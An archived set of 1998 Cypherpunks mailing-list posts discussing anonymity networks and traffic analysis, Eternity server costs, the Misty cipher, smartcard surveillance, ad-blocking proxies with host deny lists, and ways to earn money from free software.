From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rishab Aiyer Ghosh <rishab@dxm.org>
Date: Thu, 22 Jan 1998 04:24:38 +0800
To: "'cypherpunks@cyberpass.net>
Subject: security and hidden networks (was On the LAM--Local Area Mixes)
Message-ID: <01BD26CD.34C94A00@d439.pppdel.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain



summary

this post suggests that technically, routing through a sub-network 
does not necessarily increase complexity or hinder traffic analysis,
as it can be treated as a virtual node. given that, LAM-type networks
may not provide much protection in a politically unkind environment.
i also suggest a way of rating (or classifying) secure networks based
on how well they hide suspect data and routes in other traffic.

as this in response to tim may's LAM post, i'll respond quoting that.

Tim May <tcmay@got.net> writes:
>A message would enter the physical site, bounce around to N machines, and
>exit, perhaps going to other machines and sites, and back again, etc. (The
>image was of perhaps 20 or 30 cheap PCs linked with Ethernet in a set of
>apartments in Berkeley--obtaining search warrants or court orders to allow
>monitoring of all 20 or 30 machines, scattered across several physical
>addresses, would be "problematic.")

i won't repeat my objections to a reliance on "problematic" court orders, which
i've made in another post. let us simply assume, for example, that i am the
NSA, and i don't need court orders, but i'm a sneaky sort so i don't want to
go in with guns blazing just yet. Alice has a network, alice.net, 10.1.1.0. she
has many machines on this network, some hers, some belonging to Bob. 
when Alice and Bob plan stink-bomb attacks on the IRS (sorry, when they,
or Li-Xia and Bu-pang, write articles on human rights violations in xinjiang) 
to Carol and David, outside their network, they first bounce their packets around
their 30 machines.

i sniff all packets going into and out of the network 10.1.1.0, from the upstream
provider (Alice has her whole building in a faraday cage, which is ok because she
never tries to use her mobile phone indoors). so. does it matter in the least, to
me, whether alice wrote her last rant from kitchen.alice.net (10.1.1.1) or garage.alice.net
(10.1.1.2) or whether it was actually Bob - Bob Inc, to be safe - from 10.1.1.33?

it could matter politically/legally (if i wanted to prosecute) or technically (if i want
to trace traffic down, to, from or through alice's net). technically first: it doesn't
really matter. i treat alice's net as a hermetically sealed virtual "node"...

>-- the routing topology of the site may be an interesting area to look at.
>Ideally, a "Linda"-like broadcast topology (all machines see all packets,
>like messages in a bottle thrown into the "sea") could have certain

... which is all the more correct topologically if broadcast addresses (10.1.1.255)
are used. so i treat alice's net as a single node, and monitor traffic as it enters
and leaves that "node". just as i would monitor traffic entering and leaving a
single machine, without caring much which disk drive or memory bank it passed
through.

with a single physical entry and exit point to the network it can be treated exactly 
as if it were a single node for the purposes of any traffic analysis (security/traceability).
multiple physical connections might complicate it slightly, but if i'm sniffing them
all, and they connect to the same set of machines (i.e. the same network), not much
(if it's IP the address spaces may differ but that's a minor matter).

depending on what remailer math tells us - and we really do need remailer math, as
tim pointed out! - bouncing traffic around sub-nets may have little impact on
security. it could remain the same; i don't see how it could become much better;
it could plausibly get worse, if multiple nodes in a single subnet can eat into your 
random route hops resulting in concentration of traffic through fewer virtual "nodes".

the only situation in which this isn't true is if the source and destination of traffic
are both within the sealed network - presumably what would happen most of the
time with tim's suggestion of voice/high-bandwidth stuff.

now for the political/legal bit. given that i'd like to see cypherpunk technology as
daring enough to be of use outside western democracies, let's look at a slightly
challenging situation. you're a bunch of people, each with your own firm for added
safety, in this building. now i'm not a decent american cop, worried about court
orders etc. ok, i don't exactly want to shoot all of you at once. but if i am satisfied
(which i could be, using technical methods) that lots of "suspicious" stuff is coming
from your network, then i'll certainly come in and reeducate you all on your "errors
and distortions." (sorry, just finished a week of watching andrzej wajda films at a
retrospective.) 

oho. it's a BIG building. and i don't really suspect all of you. ok, i go have a chat
with the network admin - Alice - and hold her responsible. she has great respect
for the government and police and would never write such a nasty thing as "the
state tortures political prisoners?" uh oh. so i tell her that for the good of the country
she must let someone listen in at her machine ("you didn't keep logs? ah, that was
a mistake, no?") - i'm now inside, and the sealed network shrinks. of course if i'm 
impatient and don't believe her innocent approach, i just use the rubber hose. 

the same goes for multiple physical links into the same network.

can _technology_ - rather than relying on law-abiding cops, and rights-abiding
laws - provide a solution? the key is the BIG building. the more non-suspicious
routes there are - i.e. a route through normal, unsuspected people, typically
but not necessarily outside the physically well-protected area - the harder to 
usefully treat a network as a virtual node. looking at 10.1.1.0 as a node may 
help, just 256 people there; but 10.1.0.0 is a bit big to make a coherent "node"

so although a LAM may be a great way to _test_ new tech and protocols out,
i'd think it a big mistake to actually deploy it, as it were, on a large scale. it
wouldn't help at all in the tough spots, and it would only serve to make the 
easier spots tougher, strengthening the immune system of would-be tyrannical
states (i.e. the nicer western democracies). in general "WAMs" would be much
more helpful and secure. 

the other thing that helps is of course the degree of non-suspicious traffic on
suspected routes. putting them together, i think you can get some measure
of the utility of a protocol and topology. 

the ideal would a) make it technically impossible to trace the route of suspicious 
traffic; and b) make it politically/legally difficult to prosecute originators/destinations
of suspicious traffic. it would do this by a) blurring the distinction between suspicious
and "regular" routes; and b) make it difficult to distinguish suspicious from harmless
traffic on those routes; c) make it difficult or impossible to block suspicious routes
or intercept/monitor suspicious traffic without causing unacceptable deterioration
of service for "ordinary" traffic.

two ratios seem useful to me as a way of organising cryptoanarchic network protocols. 
suspicious routes/ordinary routes; suspicious/ordinary traffic on any route. an ideal universal
DC-Net with padding to keep constant throughput would have both ratios tending towards 1 - 
there is only one route - broadcast - for everyone; and traffic is constant so the degree of
really suspicious stuff is unknown.

pure Blacknet-type systems tend towards [1,0] - there is only one route, assuming everyone
uses it. but without padding, you could suspect all traffic.

Pipenet tends towards [0,1] - there are many routes, and they're all pretty suspicious
as it's possible for the monitor to discriminate among them. but traffic is constant, so
you don't know when to suspect. 

regards,
rishab

First Monday - The Peer-Reviewed Journal on the Internet 
http://www.firstmonday.dk/  Munksgaard International Publishers, Copenhagen
          
Intl & Managing Editor - Rishab Aiyer Ghosh (ghosh@firstmonday.dk) 
Mobile +91 98110 14574; Fax +91 11 2209608; Tel +91 11 2454717 
A4/204 Ekta Apts., 9 Indraprastha Extn, New Delhi 110092 INDIA








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Rishab Aiyer Ghosh <rishab@dxm.org>
Date: Thu, 22 Jan 1998 05:45:08 +0800
To: "'cypherpunks@cyberpass.net>
Subject: politics of topology (was On the LAM--Local Area Mixes)
Message-ID: <01BD26CD.3CF0B100@d439.pppdel.vsnl.net.in>
MIME-Version: 1.0
Content-Type: text/plain




m k gandhi used to say that it was good india was colonised by the _british_ -
the poor fools were vulnerable to non-violent rational argument and (relatively) 
concerned about such oddities as human rights.

one problem with tim may's idea for local area mixes is just that: relying on
US stickliness on wimpy rules for search/interception is all very well, but 
wouldn't fly in china. i won't get into the argument over how awful
the US state is here, but if all cypherpunk technology can fight is the "tyrannical"
democracies of the west, it's not much good, IMNSHO. 

besides, if such technology becomes widespread in, say, the US, then it's 
inevitable that the authorities will tend towards more _real_ tyrannical behaviour, 
diluting search/seizure protections and taking you closer to china. a weak vaccine
 _strengthens_ the microbe it is supposed to kill. 

today your tech may let you plan stink-bomb attacks on the IRS in peace; tomorrow
it may not be sufficient to let you publish articles critical of the goverment.

i always thought the cypherpunk idea ("write code" etc) was to develop tech
that is _independent_ of political protections. technology will not undermine the
power of governments, if it is based on (incorrect) assumptions that governments
will continue to restrain themselves (e.g. search & seizure) when faced by increasing
use of such tech. 

i should think that LAMs would be excellent test-beds for larger-scale systems,
but it is larger-scale systems, where you don't assume the government's _not_
snooping because it's squeamish, that matter more. 

best,
-rishab

First Monday - The Peer-Reviewed Journal on the Internet 
http://www.firstmonday.dk/  Munksgaard International Publishers, Copenhagen
          
Intl & Managing Editor - Rishab Aiyer Ghosh (ghosh@firstmonday.dk) 
Mobile +91 98110 14574; Fax +91 11 2209608; Tel +91 11 2454717 
A4/204 Ekta Apts., 9 Indraprastha Extn, New Delhi 110092 INDIA









From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Bill Stewart <bill.stewart@pobox.com>
Date: Thu, 22 Jan 1998 17:13:56 +0800
To: Jim Choate <cypherpunks@ssz.com (Cypherpunks Distributed Remailer)
Subject: Re: (eternity) Eternity as a secure filesystem/backup medium (fwd)
In-Reply-To: <199801201526.JAA26626@einstein.ssz.com>
Message-ID: <3.0.5.32.19980122005300.0083b300@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



At 09:26 AM 1/20/98 -0600, Jim Choate wrote:
>> From: Bill Stewart <bill.stewart@pobox.com>
>> 1) Storage of information - Storage currently costs < $1/MB for raw disk, 
>> and getting cheaper by the minute,
>
>Assuming your 5 year plan, a 1G drive costs $100 or less. That's roughly
>$20/G-yr.
>> The costs of the equipment for permanent storage are probably about
>> 10-50% more than the costs for storing for 5 years;
>A Cyrix P200 runs about $600 for a working box (I bought one just a few
>weeks ago). So that gives us about $120/cpu-year.

You missed my point - the cost of a CPU-year and GB-year drop rapidly
every year; the costs of storage plus associated CPU for 100 years of 
storage are probably just a bit higher than for 5 years.

>> but sysadmins, lawyers, etc.
>> cost money and they're not getting cheaper as fast.
>Granted, but except for the sys-admin you don't need them often. In all the
>years I have been in business I've needed a lawyer only a couple of times.
>Say $1k/lawyer-year.

For normal businesses, that's true, but eternity servers, if they can
be physically located, probably will require a bit more lawyery.

>> the costs of administration (assuming inflation is limited to
>> some small number) can be covered by an annuity.
>
>For reliable system administartion you're looking at 5 people (3 8-hr.
>shifts plus weekend coverage of 2 12 hour shifts). A sys admin with the
>skills and maturity to work in this environment is going to run you in
>the neighborhood of $40-60k/yr. So this means we're looking at, on the
>outside, $300k/sysadmin-yr. This is the real cost of doing business

You're probably right, though you may not need 7x24 sysadmins,
and they can share their time maintaining quite a lot of servers if
they're all cookie-cutter.

>Not shure what the normal ratio for online versus offline storage actualy
>is currently, say 10:1.

Somewhere between 10:1 and 100:1; the cost of sysadmins making tapes
may be higher than the media itself :-)

>> 2) Transmission of information - Roughly proportional to MB/time -
>This seems overly simplistic to me. The actual cost of the bandwidth is
>reasonably fixed for a given site. 

The price of pipes is very roughly proportional to their size.
The size of the pipes you need are roughly proportional to how much
data gets transmitted during your busy hour.  This gets cheaper
every year as well, but nowhere near as fast, and the volume
depends on how interesting the data is to potential readers
as well as on how big it is.  

> Remember, under the Eternity model
>we don't know *which* server is being hit for the request. 

There are different models for how to run an Eternity server,
but any server will need bandwidth based on how much is getting retrieved.
In any case, the machine transmitting data knows which request
it's responding to, even if it doesn't really know who the
requester or the author are, so it's not unreasonable to charge
a retrieval fee or stick on an advertising banner.

>> unlike storage, this one's not predictable, unless the provider and
>> author agree in advance (e.g. N free accesses per year, per password.)
>> So the provider could charge the reader for access,
>
>I fail to see the profit in giving away plans for man portable nukes or to
>turn commen cooking yeast into a THC producing horde when the various
>groups around the world would pay so many millions (or would that be
>billions) for some to get it and some to keep others from getting it. The
>potential for a access auction hasn't been explored as far as I am aware.

You might want to give away that THC recipe for free just to end
the drug war, or to make supplies cheap and plentiful, or because
it's a bogus recipe using your own special brand of yeast.  
It's the principle of the thing :-)  On the other hand,
if the provider of the service deliberately doesn't know what
the documents on the system are, to him it's just shipping bits,
and content is Somebody Else's Problem.

>> or use advertising
>> banners to fund retrieval costs (if that remains a valid model
>> for financing the web over the next N years, especially if the
>> readers retrieve data through anonymizers.)
>
>I believe advertising would be a necessity. The question is how. Would the
>payoff for doing a print ad in a magazine be worth it? Should it only
>be advertised on the net?

I'm not talking about how to get users - I'm talking about those
annoying banners from Doubleclick and LinkExchange that fund many
of the interesting services on the net because advertisers think
it's worth their money to buy impressions.

>>    If they want their names known, they can include them in the contents
>>    of the data that readers retrieve, independent of what the server does.
>Then there is no reason to use an anonymous network, simply put the data on
>their own webpage and sell it direct, cut out the middle-man a tried and
>true business tactic.
>>    and accumulate reputation capital under those nyms.
>One of the assumptions is that the source, individual server, and sink
>are all anonymous to each other as well as Mallet. Now we're changing the
>rules of the game in the middle of the game. Apples and oranges.

The assumption is that True Names and physical locations are probably
anonymous.  Doesn't mean that a reader is going to retrieve documents
of unknown content by unknown authors - you may very well know that
Zed WareMeister has the best deal on slightly-used Microsoft Products
and can be found on alt.eternity.warez, and his reputation capital 
accumulates under the pseudonym rather than his True Name.
But there will also be authors whose names are well-known but whose 
locations aren't - Salmon Rushdie may be selling digitally signed copies 
of his latest book online, but he still doesn't want to be easy to find.
				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Thu, 22 Jan 1998 15:56:27 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Gore Commission wants to regulate the Net like broadcast
In-Reply-To: <v03102802b0eca2f84a96@[207.167.93.63]>
Message-ID: <199801220801.DAA29674@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <v03102802b0eca2f84a96@[207.167.93.63]>, on 01/21/98 
   at 11:26 PM, Tim May <tcmay@got.net> said:

>(Which is why I would look for signs that Congress will seek to make ISPs
>responsible for political speech, a la the Chinese actions. Not this
>year, not next, but someday. Except it won't be explicitly a law about
>political speech, it'll be something about dangerous information, safety
>of the children, etc.)

I wouldn't be suprised if you start seeing ISP's closely monitoring the
activity of it's users RSN. I would imagine all it will take is the SPA or
COS bringing a few ISP up on criminal charges under the new Copyright laws
as accesories (or co-conspiritors). A couple of "show trials" and the rest
will toe the mark.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: He who laughs last uses OS/2.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNMbq3Y9Co1n+aLhhAQGeEgP+MbSqYmneWWv+zyCjb9ySfVv3ee9QCarb
sMJqPvuEm1KhYvDuYdtkgJtb3S/224ihhY+GnHw1JFxRyk9nUvOftcPa/NwxxCe5
YXECnaPdxNVa/Nm8GnNinuE31AOTs1YY9B9BLIYIaTMtjTpjgju5Ob5UpZ47Jo7E
UxFBc1K1Su8=
=+gm0
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Thu, 22 Jan 1998 16:14:08 +0800
To: Tim May <tcmay@got.net>
Subject: Re: Misty???
In-Reply-To: <v03102801b0ec9df81dd5@[207.167.93.63]>
Message-ID: <199801220815.DAA29824@users.invweb.net>
MIME-Version: 1.0
Content-Type: text/plain



-----BEGIN PGP SIGNED MESSAGE-----

In <v03102801b0ec9df81dd5@[207.167.93.63]>, on 01/22/98 
   at 02:00 AM, Tim May <tcmay@got.net> said:

>At 9:08 PM -0800 1/21/98, William H. Geiger III wrote:

>>Well on another mailing list I have been chastised for calling Misty
>>"snake-oil".
>>
>>Has anyone actually examined this algorithm? Seems there is an IETF Draft
>>on it (draft-ohta-misty1desc-00.txt).
>>
>>Any opinions on it?? My only exposure has be through the pidgon-english
>>posts of Nobuki Nakatuji (if it looks like a duck, it smells like a duck,
>>it quacks like a duck ....).

>I wouldn't call Misty "snake oil." But it's also been thoroughly taken
>apart and shown to be weak. Importantly, it was submitted by Mitsubishi
>for peer review.

>"Snake oil" is a name I reserve for, well, snake oil. Some of the recent
>nonsense we've seen is more snake oilish than Misty was.

>Of course, there should be no real interest in Misty anymore, except as
>an example to study, so anyone trying to promote it might be accused of
>peddling snake oil.

Someone on the OpenPGP list was asking for an asignment for an algorithm
id in the OpenPGP RFC for Misty1 (from Japan whoda thought <g>). I made my
post about snake-oil and got chastised by hal@pgp.com as he seems to think
it's a respectable algorithm:

>>Misty is described in the proceedings of the most recent annual
>>conference on fast encryption algorithms.  It is designed to be provably
>>resistant to linear and differential cryptanalysis.  As a new set of
>>algorithms (a few variants exist under the "Misty" label), it is one of
>>many where a "wait and see" attitude is appropriate to see how it holds
>>up.  As a patented algorithm, it may have trouble competing with
>>alternatives that are free of restrictions.
>>
>>However your charge that it is "snake-oil" seems unfounded.  It appears
>>to be a respectable academic development effort, within the mainstream
>>of cryptographic research, and has some reasonable-looking theory behind
>>it. As far as I know there has been no cryptanalysis or technical
>>commentary of any sort regarding Misty on the cypherpunks mailing list.


>As for Nobuki-san's consistently strange posts, I'm now persuaded he may
>be a troller. Or just not very bright.

I wonder if something isn't getting lost in the translation. He most
definatly has not mastered the English language. I remember when I first
was learning Hebrew and the number of faux pas I made. :)

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 2.6.3a at: http://users.invweb.net/~whgiii/pgpmr2.html                        
- ---------------------------------------------------------------
 
Tag-O-Matic: Bugs come in through open Windows.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNMbuII9Co1n+aLhhAQFskQP+KVSJgUQMi+3Q9vSovZRL3BLnUD08K/Vw
pyilVZQUmdwW7lIlKTepFREFr1uthvRbupJp3uHyABnLICgYreuD+KrlJv4OxXy+
DFOkM7DhAiWH8KSFpGdYub9N0ClIKXsxQfWtPS6/5rl5xuHKs8/e1uH0Lfp0o9BP
Plnq3Ze9XG4=
=8yKO
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Secret Squirrel <anon@squirrel.owl.de>
Date: Thu, 22 Jan 1998 13:16:30 +0800
To: cypherpunks@cyberpass.net
Subject: Re:  Latest smartcard software
Message-ID: <dc8a95a3add1ece5371ae8fb4a3c6036@squirrel>
MIME-Version: 1.0
Content-Type: text/plain



>They'll say hey, you've already surrendered your biometric number
>during fingerprinting for driver's licenses.
>
>It will be too late.
>
>The high-tech American Leviathan will be in place.

Sounds like Microsoft. No, really. I'm dead serious.

Like it or not, people have to use Mickeysoft crap sooner or later. Want to
read that document? Read that email? Run that program? Purchase things
(software which runs)? It's garbage. I know it's garbage. Many of us here 
know it's garbage. But we have to use it anyway. Compare this to the 
smartcard as proposed like this:

I know it's garbage. Many of us here know it's garbage. But we have to use
it anyway. Want to read that document? Read that email? Access that computer
system? Drive your car? Get in your house? Get through a toll booth? Enter
or leave the country? Better make sure your papers are in order.

The high-tech American Leviathan is already in place. The problem is that
it'll just get worse because the sheeple are, by definition, naked, stupid,
and blind.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous <nobody@REPLAY.COM>
Date: Thu, 22 Jan 1998 11:31:50 +0800
To: cypherpunks@Algebra.COM
Subject: Re: RC1 and RC3 ??
Message-ID: <199801220315.EAA18030@basement.replay.com>
MIME-Version: 1.0
Content-Type: text/plain



>At 09:28 PM 1/19/98 PST, Nobuki Nakatuji wrote:
>>
>>Why doesn't it have RC1 and RC3 though there are RC2,
>>RC4 and RC5 of RSADSI RC series ?
>
>If we told you we would have to kill you.

Cool! Let's tell him, then, so we won't have to listen to him anymore! :)





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill.stewart@pobox.com
Date: Fri, 23 Jan 1998 03:56:56 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Revenge on the Nerds  -Maureen on a rampage
In-Reply-To: <B9PoJe20w165w@bwalk.dm.com>
Message-ID: <3.0.5.32.19980122082106.00797db0@popd.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



For now, most of those services all live on machines dedicated
to the banner service, rather than on the same machine as the server.
Making machines vanish is easy - put them in your hosts file as
aliases to 127.0.0.2, and if you're behind a proxy server,
put them on your "no proxy" list.  Of course, if everybody
starts doing this, then more systems will start using ad servers
that have names in their own domain, but it works for now on
most of the major servers.  I've found that killing doubleclick.net
and linkexchange.com gets rid of most of the banners.

What I'd really like to see in a browser is an option to
turn off animated GIFs (other than by killing all images.)

>>> Speaking of browsers: I'd rather *pay* for a browser that has such an obvious
>>> feature as a list of URL regexps that you don't want to browse. Neither IE
>>> nor Netscape has it. I don't know about Lynx.  I'm now using junkbuster
>>> from www.junkbuster.com (highly recommended) to filter out ads and banners
>>> and cookies. I generally think WWW sucks; but if I use it, I want to be able
>>> to tell the browser that if the page tried to load an image from a URL
>>> that looks like
>>> 
>>> valueclick.com
>>> bannermall.com
...
>>I suggest writing a proxy server that does such filtering, running it on 
>>the local machine, and using it as proxy server from your netscape browser.
>>
>>There is a proxy server in form of a 20 line perl script, you
>>can take it and modify it.
>
>If you have a unix box, try using the roxen web/proxy server.  It has a
>regexp module that does exactly this. http://www.roxen.com

				Thanks! 
					Bill
Bill Stewart, bill.stewart@pobox.com
PGP Fingerprint D454 E202 CBC8 40BF  3C85 B884 0ABE 4639





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
Date: Fri, 23 Jan 1998 01:09:47 +0800
To: cypherpunks@toad.com
Subject: Re: Revenge on the Nerds  -Maureen on a rampage
In-Reply-To: <34c704c2.971366@128.2.84.191>
Message-ID: <LZmPJe25w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain



phelix@vallnet.com writes:

> On 22 Jan 1998 02:22:29 -0600, ichudov@Algebra.COM (Igor Chudov @ home)
> wrote:
>
> >
> >Dr.Dimitri Vulis KOTM wrote:
> >> Speaking of browsers: I'd rather *pay* for a browser that has such an obvi
> >> feature as a list of URL regexps that you don't want to browse. Neither IE
> >> nor Netscape has it. I don't know about Lynx.  I'm now using junkbuster
> >> from www.junkbuster.com (highly recommended) to filter out ads and banners
> >> and cookies. I generally think WWW sucks; but if I use it, I want to be ab
> >> to tell the browser that if the page tried to load an image from a URL
> >> that looks like
> >>
> >> valueclick.com
> >> bannermall.com
> >> adforce.*.com/
> >> bannerweb.com
> >> eads.com/
> >> /*/sponsors/*.gif
> >> *banner*.gif
> >> /image/ads/
> >>
> >> etc etc, I want the browse to ignore this request. Clearly Microsoft and
> >> Netscape both don't give a damn about the desires of their NON-PAYING user
> >> and would rather bend over for the advertisers.
> >
> >I suggest writing a proxy server that does such filtering, running it on
> >the local machine, and using it as proxy server from your netscape browser.
> >
> >There is a proxy server in form of a 20 line perl script, you
> >can take it and modify it.
> >
> >	- Igor.
>
> If you have a unix box, try using the roxen web/proxy server.  It has a
> regexp module that does exactly this. http://www.roxen.com

Thanks guys!! I'm now using the junkbusters proxy servers for this very
purpose.  It works fine.  I just think that this should be a function of
any decent browser, without requiring the extra overhead of a proxy server.

---

Dr.Dimitri Vulis KOTM
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: phelix@vallnet.com
Date: Thu, 22 Jan 1998 17:07:06 +0800
To: cypherpunks@Algebra.COM
Subject: Re: Revenge on the Nerds  -Maureen on a rampage
In-Reply-To: <B9PoJe20w165w@bwalk.dm.com>
Message-ID: <34c704c2.971366@128.2.84.191>
MIME-Version: 1.0
Content-Type: text/plain



On 22 Jan 1998 02:22:29 -0600, ichudov@Algebra.COM (Igor Chudov @ home)
wrote:

>
>Dr.Dimitri Vulis KOTM wrote:
>> Speaking of browsers: I'd rather *pay* for a browser that has such an obvious
>> feature as a list of URL regexps that you don't want to browse. Neither IE
>> nor Netscape has it. I don't know about Lynx.  I'm now using junkbuster
>> from www.junkbuster.com (highly recommended) to filter out ads and banners
>> and cookies. I generally think WWW sucks; but if I use it, I want to be able
>> to tell the browser that if the page tried to load an image from a URL
>> that looks like
>> 
>> valueclick.com
>> bannermall.com
>> adforce.*.com/
>> bannerweb.com
>> eads.com/
>> /*/sponsors/*.gif
>> *banner*.gif
>> /image/ads/
>> 
>> etc etc, I want the browse to ignore this request. Clearly Microsoft and
>> Netscape both don't give a damn about the desires of their NON-PAYING users
>> and would rather bend over for the advertisers.
>
>I suggest writing a proxy server that does such filtering, running it on 
>the local machine, and using it as proxy server from your netscape browser.
>
>There is a proxy server in form of a 20 line perl script, you
>can take it and modify it.
>
>	- Igor.

If you have a unix box, try using the roxen web/proxy server.  It has a
regexp module that does exactly this. http://www.roxen.com

-- Phelix





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Eric Murray <ericm@lne.com>
Date: Fri, 23 Jan 1998 01:06:11 +0800
To: ichudov@Algebra.COM
Subject: Re: Revenge on the Nerds  -Maureen on a rampage
In-Reply-To: <199801220537.XAA00871@manifold.algebra.com>
Message-ID: <199801221652.IAA05481@slack.lne.com>
MIME-Version: 1.0
Content-Type: text/plain



Igor Chudov @ home writes:
> 

> > to tell the browser that if the page tried to load an image from a URL
> > that looks like
> > 
> > valueclick.com
> > bannermall.com
> > adforce.*.com/
> > bannerweb.com
> > eads.com/
> > /*/sponsors/*.gif
> > *banner*.gif
> > /image/ads/
> > 
> > etc etc, I want the browse to ignore this request. Clearly Microsoft and
> > Netscape both don't give a damn about the desires of their NON-PAYING users
> > and would rather bend over for the advertisers.
> 
> I suggest writing a proxy server that does such filtering, running it on 
> the local machine, and using it as proxy server from your netscape browser.
> 
> There is a proxy server in form of a 20 line perl script, you
> can take it and modify it.
> 


I've already done the work:
http://www.lne.com/ericm/cookie_jar/

It'll block cookies, accepting them from a specific list of sites. 

It blocks the outgoing requests for ads, on a (regex-controlled)
host or URL basis.  So you don't bother to download ads, saving you
from seeing them and wasting the bandwidth downloading them.

As an example, my .cookiejarrc file currently holds:

denyhost *.doubleclick.net advertising.quote.com commonwealth.riddler.com
denyhost *.linkexchange.com *.pagecount.com images.yahoo.com www.missingkids.org
denyhost ads.*.com ad.*.com adforce.imgis.com www.bannerswap.com
denyhost *.flycast.com/ songline.com:1971/
denyurl /ads/* /ads/images/* *sponsors/redirect/* */bin/statthru* */AdID=*
denyurl /adv/* /sponsors2/*  */ad-bin/ad* /advertising/* */livetopics_anim.gif*
denyurl /Banners/* /shared/images/ad/* /sponsors3/* /adverts/* /free/FarSight/*
denyurl /ad/ /*ad*.focalink.com/


It'll let you selectively block sending the User-agent line
in the HTTP request, and will let you randomly select from a list
of User-agents that you supply if you want to mess up site's data
collection schemes.  And you can choose to block sending anything
but the Accept and Pragma lines in the HTTP request for more privacy.



-- 
Eric Murray  Chief Security Scientist  N*Able Technologies  www.nabletech.com
(email:  ericm  at  lne.com   or   nabletech.com)          PGP keyid:E03F65E5





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tim May <tcmay@got.net>
Date: Fri, 23 Jan 1998 01:12:43 +0800
To: Adam Shostack <adam@homeport.org>
Subject: Re: Misty???
In-Reply-To: <v03102801b0ec9df81dd5@[207.167.93.63]>
Message-ID: <v03102800b0ed2c4ad6da@[207.167.93.63]>
MIME-Version: 1.0
Content-Type: text/plain



At 7:54 AM -0800 1/22/98, Adam Shostack wrote:
>Tim May wrote:
>| At 9:08 PM -0800 1/21/98, William H. Geiger III wrote:
>
>| >Any opinions on it?? My only exposure has be through the pidgon-english
>| >posts of Nobuki Nakatuji (if it looks like a duck, it smells like a duck,
>| >it quacks like a duck ....).
>|
>| I wouldn't call Misty "snake oil." But it's also been thoroughly taken
>| apart and shown to be weak. Importantly, it was submitted by Mitsubishi for
>| peer review.
>
>Could you provide a pointer to the analysis paper?
>

No, as I was thinking of FEAL when I wrote about MISTY.

Sorry for any confusion.


--Tim May


The Feds have shown their hand: they want a ban on domestic cryptography
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
ComSec 3DES:   408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^2,976,221   | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Michael Stutz <stutz@dsl.org>
Date: Thu, 22 Jan 1998 22:30:06 +0800
To: cypherpunks@cyberpass.net
Subject: Re: Deriving economic profits from writing FREE software?
In-Reply-To: <199801210243.DAA05915@basement.replay.com>
Message-ID: <Pine.LNX.3.95.980122085522.10685G-100000@nacs.net>
MIME-Version: 1.0
Content-Type: text/plain



On Wed, 21 Jan 1998, Anonymous wrote:

> Bill Stewart wrote:
> 
> > At 10:11 PM 1/16/98 -0600, Igor wrote:
> > >However, aside from the psychic benefits, I would like to somehow derive
> > >an economic profit from being a freeware author. So far, I feel that the
> > >status of the author of a popular package does sound good on a resume, but
> > >it is as far as I could get.
> > >
> > >Does anyone else feel the same way? Has anybody come up with a way to
> > >cash in on the free programs that he writes?
> > 
> > There's the standard shareware model - ask for $25.
> > There's the Cygnus model - charge money for support.
> > There's the Netscape/McAfee/etc. model - free for personal use,
> >         charge money to companies that use it.
> > There's the Eudora model - basic version free, bells&whistles extra.
> > There's the advertising-banner model - the software/service is free,
> >         but usage hits an advertising banner in some way that
> >         filters money back to you.
> 
> There's the Intel model - give away software to sell new hardware.
> There's the Linus Torvalds model - people pay you to speak at conferences.
> There's the w3c model - pay money if you want it now, or wait and get it for
>         free next month.
> There's the book model - give away the software and sell the documentation.
> There's the PGP model - give it away until it becomes popular, then sell it.

There's the FSF model - give it away and ask for donations, but offer
	expensive "bundles" that are bought by enlightened companies and/or
	enlightened Dilberts at un-enlightened companies.
There's the Red Hat model - give it away on an ftp site but charge for a
	nice package with manual and support.
There's the Aladdin model - give away old versions but the latest is non-free.
